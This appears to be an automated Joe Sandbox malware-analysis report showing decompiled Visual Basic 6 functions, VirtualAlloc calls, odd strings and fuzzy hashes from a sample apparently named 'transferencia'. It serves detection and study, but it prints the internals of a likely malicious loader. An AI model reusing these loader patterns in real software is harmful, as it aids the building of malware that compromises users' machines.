Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ddc887a5c0d6044a671beb784f843372c3dde35f45c3016beb5c20110c5198c5
Instruction ID: d837a0bb9042188da3bbb8ae816e07fc90955bdff5a8106705bdbc120b8dfe56
Opcode Fuzzy Hash: ddc887a5c0d6044a671beb784f843372c3dde35f45c3016beb5c20110c5198c5
Instruction Fuzzy Hash: 2DF14862B0A7000B975994BE88D0957D4C7DFEB26023AE63A652DF33A4FD79CD4B1248

Uniqueness

Uniqueness Score: -1.00%

Function 0040474A, Relevance: 1.9, APIs: 1, Instructions: 698memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6cc76f32c3b726c11e965a2c5822a7bc59c214258f4bc83648da6d09a4b22e4b
Instruction ID: bc7bea162dbd3a752f0d9f60b531de4539b0c1f874898bd6759501c59516258d
Opcode Fuzzy Hash: 6cc76f32c3b726c11e965a2c5822a7bc59c214258f4bc83648da6d09a4b22e4b
Instruction Fuzzy Hash: 1EE14962B097004B975994BE88C0957D0C7DFEB26033AE63A652DF33A5ED7DCD4B1248

Uniqueness

Uniqueness Score: -1.00%

Function 004047D0, Relevance: 1.9, APIs: 1, Instructions: 662memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 38b334ba24ac854cafcc81e75058f451aff850874175a6d4f69ac16f3c0e6313
Instruction ID: 70b2f47be935a2e46a8577770f86c6cc243cf0bb172dc3d62ea97af1dea5ce9b
Opcode Fuzzy Hash: 38b334ba24ac854cafcc81e75058f451aff850874175a6d4f69ac16f3c0e6313
Instruction Fuzzy Hash: 75D13A62B0A7004B976994BE48D0957D0C7DFEB26023AE63A652DF33A4FD7DCD4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404847, Relevance: 1.9, APIs: 1, Instructions: 655memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 87258d6f2a7f68e65c6936345b1505abd89d6dd88fd747a20a4639ab03158477
Instruction ID: 2ec1e2e71d231b55c1886356bf7ffd1f96dae83d949e5057a83b5d743a62b762
Opcode Fuzzy Hash: 87258d6f2a7f68e65c6936345b1505abd89d6dd88fd747a20a4639ab03158477
Instruction Fuzzy Hash: 10D13662B0A7004B876994BE88D0957D4C7DFEB26023AE63A652DF33A4FD7DCD4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 004048D1, Relevance: 1.9, APIs: 1, Instructions: 624memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 92d202e665f92a29264147b841d3a6c0818b8d25207d2aaf5c2ef9bba4108812
Instruction ID: fc651e4ba1a11e34ab0983655192a3f1c6cc7a345594b97da6656dad738a4b62
Opcode Fuzzy Hash: 92d202e665f92a29264147b841d3a6c0818b8d25207d2aaf5c2ef9bba4108812
Instruction Fuzzy Hash: CBC13862B0A7004B876994BE88D0957D0C7DFEB26023AE63A652DF33A4FD79CD4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 004049C9, Relevance: 1.8, APIs: 1, Instructions: 521memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3c0680581f387af286c51cccc969dcf99dca13b5a7b3711e9d5a84d001c1d8e2
Instruction ID: 6aea3ec1d5db5ad28346f1582ccb21b1dd199e4f738752f9f4ac0f6504ed2e39
Opcode Fuzzy Hash: 3c0680581f387af286c51cccc969dcf99dca13b5a7b3711e9d5a84d001c1d8e2
Instruction Fuzzy Hash: C5B14762B0A7000B976994BE88D0957D4C7DFEB26023AF63A652DF73A4ED7DCD4B0148

Uniqueness

Uniqueness Score: -1.00%

Function 00404A43, Relevance: 1.8, APIs: 1, Instructions: 518memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ebd54d29fd0c764de8ce289339466acff0fd81f910eb773e2b6b393505e18cd5
Instruction ID: bb2db1675013b21884dcd9e6581d741abb83d564bb6865032902dbbd0d0140d5
Opcode Fuzzy Hash: ebd54d29fd0c764de8ce289339466acff0fd81f910eb773e2b6b393505e18cd5
Instruction Fuzzy Hash: D8A13662B0A7004B976998BE88C0957D4C7DFEB26023AF63A552DF33A4ED7DCD4B1148

Uniqueness

Uniqueness Score: -1.00%

Function 004102A2, Relevance: 63.3, APIs: 34, Strings: 2, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E004102A2(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				char _v32;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char* _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				char _v128;
				short _v164;
				signed int _v168;
				intOrPtr* _v176;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				char* _t127;
				signed int _t130;
				char* _t134;
				signed int _t137;
				char* _t141;
				signed int _t144;
				short _t148;
				char* _t151;
				char* _t162;
				signed int _t166;
				char* _t167;
				intOrPtr _t202;

				_push(0x401236);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t202;
				L00401230();
				_v12 = _t202;
				_v8 = 0x4011f8;
				_push(0x40d460);
				L0040130E();
				L0040138C();
				_push(0xb8);
				_push(0x40d46c);
				L00401392();
				asm("sbb eax, eax");
				_v164 =  ~( ~( ~0xb8));
				L004013BC();
				if(_v164 != 0) {
					if( *0x412010 != 0) {
						_v176 = 0x412010;
					} else {
						_push(0x412010);
						_push(0x40d778);
						L0040139E();
						_v176 = 0x412010;
					}
					_t162 =  &_v28;
					L004013A4();
					_v164 = _t162;
					_t166 =  *((intOrPtr*)( *_v164 + 0x130))(_v164,  &_v32, _t162,  *((intOrPtr*)( *((intOrPtr*)( *_v176)) + 0x314))( *_v176));
					asm("fclex");
					_v168 = _t166;
					if(_v168 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x40d314);
						_push(_v164);
						_push(_v168);
						L004013CE();
						_v180 = _t166;
					}
					_push(0);
					_push(0);
					_push(_v32);
					_t167 =  &_v48;
					_push(_t167);
					L00401350();
					_push(_t167);
					L00401302();
					L0040138C();
					_push(_t167);
					L00401308();
					L004013BC();
					_push( &_v32);
					_push( &_v28);
					_push(2);
					L00401398();
					_t202 = _t202 + 0x1c;
					L004013AA();
				}
				if( *0x412010 != 0) {
					_v184 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v184 = 0x412010;
				}
				_t127 =  &_v28;
				L004013A4();
				_v164 = _t127;
				_t130 =  *((intOrPtr*)( *_v164 + 0x208))(_v164, _t127,  *((intOrPtr*)( *((intOrPtr*)( *_v184)) + 0x370))( *_v184));
				asm("fclex");
				_v168 = _t130;
				if(_v168 >= 0) {
					_v188 = _v188 & 0x00000000;
				} else {
					_push(0x208);
					_push(0x40d430);
					_push(_v164);
					_push(_v168);
					L004013CE();
					_v188 = _t130;
				}
				L00401380();
				if( *0x412010 != 0) {
					_v192 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v192 = 0x412010;
				}
				_t134 =  &_v28;
				L004013A4();
				_v164 = _t134;
				_t137 =  *((intOrPtr*)( *_v164 + 0x128))(_v164, _t134,  *((intOrPtr*)( *((intOrPtr*)( *_v192)) + 0x32c))( *_v192));
				asm("fclex");
				_v168 = _t137;
				if(_v168 >= 0) {
					_v196 = _v196 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40d2c4);
					_push(_v164);
					_push(_v168);
					L004013CE();
					_v196 = _t137;
				}
				L00401380();
				if( *0x412010 != 0) {
					_v200 = 0x412010;
				} else {
					_push(0x412010);
					_push(0x40d778);
					L0040139E();
					_v200 = 0x412010;
				}
				_t141 =  &_v28;
				L004013A4();
				_v164 = _t141;
				_t144 =  *((intOrPtr*)( *_v164 + 0x1ac))(_v164, _t141,  *((intOrPtr*)( *((intOrPtr*)( *_v200)) + 0x36c))( *_v200));
				asm("fclex");
				_v168 = _t144;
				if(_v168 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0x1ac);
					_push(0x40d314);
					_push(_v164);
					_push(_v168);
					L004013CE();
					_v204 = _t144;
				}
				L00401380();
				_v104 = L"14:14:14";
				_v112 = 8;
				L00401368();
				_push( &_v48);
				_push( &_v64); // executed
				L004012F6(); // executed
				_v120 = 0xe;
				_v128 = 0x8002;
				_push( &_v64);
				_t148 =  &_v128;
				_push(_t148);
				L004012FC();
				_v164 = _t148;
				_push( &_v64);
				_push( &_v48);
				_push(2);
				L004013B0();
				_t151 = _v164;
				if(_t151 != 0) {
					_v88 = 0x80020004;
					_v96 = 0xa;
					_v72 = 0x80020004;
					_v80 = 0xa;
					_v56 = 0x80020004;
					_v64 = 0xa;
					_v104 = L"Stresset2";
					_v112 = 8;
					L00401368();
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_push(0);
					_push( &_v48);
					L004012F0();
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_t151 =  &_v48;
					_push(_t151);
					_push(4);
					L004013B0();
				}
				_push(0x41072b);
				return _t151;
			}

0x004102a7
0x004102b2
0x004102b3
0x004102bf
0x004102c7
0x004102ca
0x004102d1
0x004102d6
0x004102e0
0x004102e5
0x004102e6
0x004102eb
0x004102f2
0x004102f8
0x00410302
0x00410310
0x0041031d
0x0041033a
0x0041031f
0x0041031f
0x00410324
0x00410329
0x0041032e
0x0041032e
0x0041035e
0x00410362
0x00410367
0x0041037f
0x00410385
0x00410387
0x00410394
0x004103b9
0x00410396
0x00410396
0x0041039b
0x004103a0
0x004103a6
0x004103ac
0x004103b1
0x004103b1
0x004103c0
0x004103c2
0x004103c4
0x004103c7
0x004103ca
0x004103cb
0x004103d3
0x004103d4
0x004103de
0x004103e3
0x004103e4
0x004103ec
0x004103f4
0x004103f8
0x004103f9
0x004103fb
0x00410400
0x00410406
0x00410406
0x00410412
0x0041042f
0x00410414
0x00410414
0x00410419
0x0041041e
0x00410423
0x00410423
0x00410453
0x00410457
0x0041045c
0x00410470
0x00410476
0x00410478
0x00410485
0x004104aa
0x00410487
0x00410487
0x0041048c
0x00410491
0x00410497
0x0041049d
0x004104a2
0x004104a2
0x004104b4
0x004104c0
0x004104dd
0x004104c2
0x004104c2
0x004104c7
0x004104cc
0x004104d1
0x004104d1
0x00410501
0x00410505
0x0041050a
0x0041051e
0x00410524
0x00410526
0x00410533
0x00410558
0x00410535
0x00410535
0x0041053a
0x0041053f
0x00410545
0x0041054b
0x00410550
0x00410550
0x00410562
0x0041056e
0x0041058b
0x00410570
0x00410570
0x00410575
0x0041057a
0x0041057f
0x0041057f
0x004105af
0x004105b3
0x004105b8
0x004105cc
0x004105d2
0x004105d4
0x004105e1
0x00410606
0x004105e3
0x004105e3
0x004105e8
0x004105ed
0x004105f3
0x004105f9
0x004105fe
0x004105fe
0x00410610
0x00410615
0x0041061c
0x00410629
0x00410631
0x00410635
0x00410636
0x0041063b
0x00410642
0x0041064c
0x0041064d
0x00410650
0x00410651
0x00410656
0x00410660
0x00410664
0x00410665
0x00410667
0x0041066f
0x00410678
0x0041067a
0x00410681
0x00410688
0x0041068f
0x00410696
0x0041069d
0x004106a4
0x004106ab
0x004106b8
0x004106c0
0x004106c4
0x004106c8
0x004106c9
0x004106ce
0x004106cf
0x004106d7
0x004106db
0x004106df
0x004106e0
0x004106e3
0x004106e4
0x004106e6
0x004106eb
0x004106ee
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 004102BF
#521.MSVBVM60(0040D460,?,?,?,?,00401236), ref: 004102D6
__vbaStrMove.MSVBVM60(0040D460,?,?,?,?,00401236), ref: 004102E0
__vbaStrCmp.MSVBVM60(0040D46C,00000000,0040D460,?,?,?,?,00401236), ref: 004102EB
__vbaFreeStr.MSVBVM60(0040D46C,00000000,0040D460,?,?,?,?,00401236), ref: 00410302
__vbaNew2.MSVBVM60(0040D778,00412010,0040D46C,00000000,0040D460,?,?,?,?,00401236), ref: 00410329
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410362
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D314,00000130), ref: 004103AC
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004103CB
__vbaStrVarMove.MSVBVM60(00000000), ref: 004103D4
__vbaStrMove.MSVBVM60(00000000), ref: 004103DE
#532.MSVBVM60(00000000,00000000), ref: 004103E4
__vbaFreeStr.MSVBVM60(00000000,00000000), ref: 004103EC
__vbaFreeObjList.MSVBVM60(00000002,00000000,?,00000000,00000000), ref: 004103FB
__vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 00410406
__vbaNew2.MSVBVM60(0040D778,00412010,0040D46C,00000000,0040D460,?,?,?,?,00401236), ref: 0041041E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410457
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D430,00000208), ref: 0041049D
__vbaFreeObj.MSVBVM60(00000000,?,0040D430,00000208), ref: 004104B4
__vbaNew2.MSVBVM60(0040D778,00412010), ref: 004104CC
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410505
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D2C4,00000128), ref: 0041054B
__vbaFreeObj.MSVBVM60(00000000,?,0040D2C4,00000128), ref: 00410562
__vbaNew2.MSVBVM60(0040D778,00412010), ref: 0041057A
__vbaObjSet.MSVBVM60(?,00000000), ref: 004105B3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D314,000001AC), ref: 004105F9
__vbaFreeObj.MSVBVM60(00000000,?,0040D314,000001AC), ref: 00410610
__vbaVarDup.MSVBVM60(00000000,?,0040D314,000001AC), ref: 00410629
#544.MSVBVM60(?,?), ref: 00410636
__vbaVarTstNe.MSVBVM60(00008002,?,?,?), ref: 00410651
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?), ref: 00410667
__vbaVarDup.MSVBVM60 ref: 004106B8
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A), ref: 004106CF
__vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A), ref: 004106E6

Strings

14:14:14, xrefs: 00410615
Stresset2, xrefs: 004106A4

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: __vba$Free$CheckHresultNew2$ListMove$#521#532#544#595CallChkstkLate
String ID: 14:14:14$Stresset2
API String ID: 1208560772-1428158757
Opcode ID: 147e39eeca6aec6bc4ea32fa46271fa4cc964c286b0407781524029d95d24e63
Instruction ID: bacd24f309d3d30b01850570ca82f87c89ea82802c78f1b7e5c4b912c716f7a6
Opcode Fuzzy Hash: 147e39eeca6aec6bc4ea32fa46271fa4cc964c286b0407781524029d95d24e63
Instruction Fuzzy Hash: 2DC11C70E003189FDB20DFA0C845BDEB7B9BF09304F1045AAE645B71A1DBB85A85CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE14, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 176
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E0040EE14(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				short _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				signed int _v100;
				char _v108;
				void* _v112;
				char _v116;
				char _v124;
				signed int _v128;
				char _v144;
				char _v160;
				char* _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _t119;
				char* _t125;
				signed int _t136;
				signed int _t141;
				signed int _t145;
				signed int _t154;
				void* _t164;
				void* _t166;
				intOrPtr _t167;

				_t167 = _t166 - 0xc;
				 *[fs:0x0] = _t167;
				L00401230();
				_v16 = _t167;
				_v12 = 0x401138;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401236, _t164);
				_t119 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
				asm("fclex");
				_v128 = _t119;
				if(_v128 >= 0) {
					_v176 = _v176 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x40cb6c);
					_push(_a4);
					_push(_v128);
					L004013CE();
					_v176 = _t119;
				}
				_v68 = 1;
				_v76 = 2;
				_v84 = 0x2dbf;
				_v92 = 2;
				_v100 = _v100 & 0x00000000;
				_v108 = 2;
				_push( &_v76);
				_push( &_v92);
				_push( &_v108);
				_push( &_v160);
				_push( &_v144);
				_t125 =  &_v40;
				_push(_t125);
				L004013C8();
				_v172 = _t125;
				while(_v172 != 0) {
					 *((intOrPtr*)( *_a4 + 0x718))(_a4);
					_v124 =  *0x401130;
					 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v124, L"udpantningernes");
					_t136 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v116);
					_v128 = _t136;
					if(_v128 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x700);
						_push(0x40cb9c);
						_push(_a4);
						_push(_v128);
						L004013CE();
						_v180 = _t136;
					}
					_v52 = _v116;
					_v112 = 0x25a;
					_t141 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v112, L"kacha");
					_v128 = _t141;
					if(_v128 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x704);
						_push(0x40cb9c);
						_push(_a4);
						_push(_v128);
						L004013CE();
						_v184 = _t141;
					}
					_t145 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v116);
					_v128 = _t145;
					if(_v128 >= 0) {
						_v188 = _v188 & 0x00000000;
					} else {
						_push(0x708);
						_push(0x40cb9c);
						_push(_a4);
						_push(_v128);
						L004013CE();
						_v188 = _t145;
					}
					_v56 = _v116;
					L004013C2();
					 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v60, 0xcac);
					L004013BC();
					_t154 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v112);
					_v128 = _t154;
					if(_v128 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x70c);
						_push(0x40cb9c);
						_push(_a4);
						_push(_v128);
						L004013CE();
						_v192 = _t154;
					}
					_v48 = _v112;
					_push( &_v160);
					_push( &_v144);
					_t125 =  &_v40;
					_push(_t125);
					L004013B6();
					_v172 = _t125;
				}
				_v12 = 0xffd42402;
				_v12 = _v12 + 0x6c1c73;
				_push(_v12);
				return _t125;
			}

0x0040ee17
0x0040ee26
0x0040ee32
0x0040ee3a
0x0040ee3d
0x0040ee4a
0x0040ee53
0x0040ee5e
0x0040ee69
0x0040ee6f
0x0040ee71
0x0040ee78
0x0040ee97
0x0040ee7a
0x0040ee7a
0x0040ee7f
0x0040ee84
0x0040ee87
0x0040ee8a
0x0040ee8f
0x0040ee8f
0x0040ee9e
0x0040eea5
0x0040eeac
0x0040eeb3
0x0040eeba
0x0040eebe
0x0040eec8
0x0040eecc
0x0040eed0
0x0040eed7
0x0040eede
0x0040eedf
0x0040eee2
0x0040eee3
0x0040eee8
0x0040f085
0x0040eefb
0x0040ef07
0x0040ef1b
0x0040ef2d
0x0040ef33
0x0040ef3a
0x0040ef59
0x0040ef3c
0x0040ef3c
0x0040ef41
0x0040ef46
0x0040ef49
0x0040ef4c
0x0040ef51
0x0040ef51
0x0040ef63
0x0040ef66
0x0040ef7d
0x0040ef83
0x0040ef8a
0x0040efa9
0x0040ef8c
0x0040ef8c
0x0040ef91
0x0040ef96
0x0040ef99
0x0040ef9c
0x0040efa1
0x0040efa1
0x0040efbc
0x0040efc2
0x0040efc9
0x0040efe8
0x0040efcb
0x0040efcb
0x0040efd0
0x0040efd5
0x0040efd8
0x0040efdb
0x0040efe0
0x0040efe0
0x0040eff2
0x0040effd
0x0040f013
0x0040f01c
0x0040f02d
0x0040f033
0x0040f03a
0x0040f059
0x0040f03c
0x0040f03c
0x0040f041
0x0040f046
0x0040f049
0x0040f04c
0x0040f051
0x0040f051
0x0040f064
0x0040f06e
0x0040f075
0x0040f076
0x0040f079
0x0040f07a
0x0040f07f
0x0040f07f
0x0040f092
0x0040f099
0x0040f0a0
0x0040f0a3

APIs

__vbaChkstk.MSVBVM60(?,00401236), ref: 0040EE32
__vbaHresultCheckObj.MSVBVM60(00000000,00401138,0040CB6C,000002B4), ref: 0040EE8A
__vbaVarForInit.MSVBVM60(?,?,?,00000002,00000002,00000002), ref: 0040EEE3
__vbaHresultCheckObj.MSVBVM60(00000000,00401138,0040CB9C,00000700), ref: 0040EF4C
__vbaHresultCheckObj.MSVBVM60(00000000,00401138,0040CB9C,00000704), ref: 0040EF9C
__vbaHresultCheckObj.MSVBVM60(00000000,00401138,0040CB9C,00000708), ref: 0040EFDB
__vbaStrCopy.MSVBVM60(00000000,00401138,0040CB9C,00000708), ref: 0040EFFD
__vbaFreeStr.MSVBVM60 ref: 0040F01C
__vbaHresultCheckObj.MSVBVM60(00000000,00401138,0040CB9C,0000070C), ref: 0040F04C
__vbaVarForNext.MSVBVM60(?,?,?), ref: 0040F07A

Strings

udpantningernes, xrefs: 0040EF0A
kacha, xrefs: 0040EF6C
Teleman3, xrefs: 0040EFF5

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: __vba$CheckHresult$ChkstkCopyFreeInitNext
String ID: Teleman3$kacha$udpantningernes
API String ID: 1411508969-2426976796
Opcode ID: 8badfcd544f5464f4159309d9c6101f1fd074143e9d4af27446234d0db9c7f12
Instruction ID: 28db9f079ca5ff0a890ec9758dc4b7bd8a532801ab9631ca0f4070a41455160d
Opcode Fuzzy Hash: 8badfcd544f5464f4159309d9c6101f1fd074143e9d4af27446234d0db9c7f12
Instruction Fuzzy Hash: 9A81C771D00208EFDB21DFA5C845BCDBBB4FF08304F1081AAF519AB2A1D779AA958F54

Uniqueness

Uniqueness Score: -1.00%

Function 004013EC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#100.MSVBVM60(VB5!6&*), ref: 004013F1

Strings

VB5!6&*, xrefs: 004013EC, 00401442

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: eae4e97807332cebda32febc5088d2e8e4b3e4014d1b61fa97e6185754b64020
Instruction ID: 9dcd18fd860ae2635564cb70f6792d9b47b165c89668162279468877300435a8
Opcode Fuzzy Hash: eae4e97807332cebda32febc5088d2e8e4b3e4014d1b61fa97e6185754b64020
Instruction Fuzzy Hash: FE21226245E3D24FC7038B7498B63813FB09E53218B6E44EBC8C0CF5B3D259494AC766

Uniqueness

Uniqueness Score: -1.00%

Function 00404AC3, Relevance: 1.7, APIs: 1, Instructions: 454memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.851373742.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.851384548.0000000000413000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_transferencia.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4b671f44e01e6c4736c41122648a3d651caef553dabf5803eb3c6ff50509445a
Instruction ID: 0f8707177597610f9eeed19c1e8ef01b4eca4b34f145972266e7aaa189b6d3b1
Opcode Fuzzy Hash: 4b671f44e01e6c4736c41122648a3d651caef553dabf5803eb3c6ff50509445a
Instruction Fuzzy Hash: 2B913662B0A7004B976998BE88C0957D4C7DFEB26063AF63A552DF33A4ED7DCD4B0148

Uniqueness

Uniqueness Score: -1.00%

Function 00404B40, Relevance: 1.7, APIs: 1, Instructions: 451memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,FFFF9E89,FFFFFC61), ref: 00404EBC

Memory Dump Source

Source File: 00000000.00000002.851346844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.851335620.0000000000400000.00000002.00020000.sdmp Download File
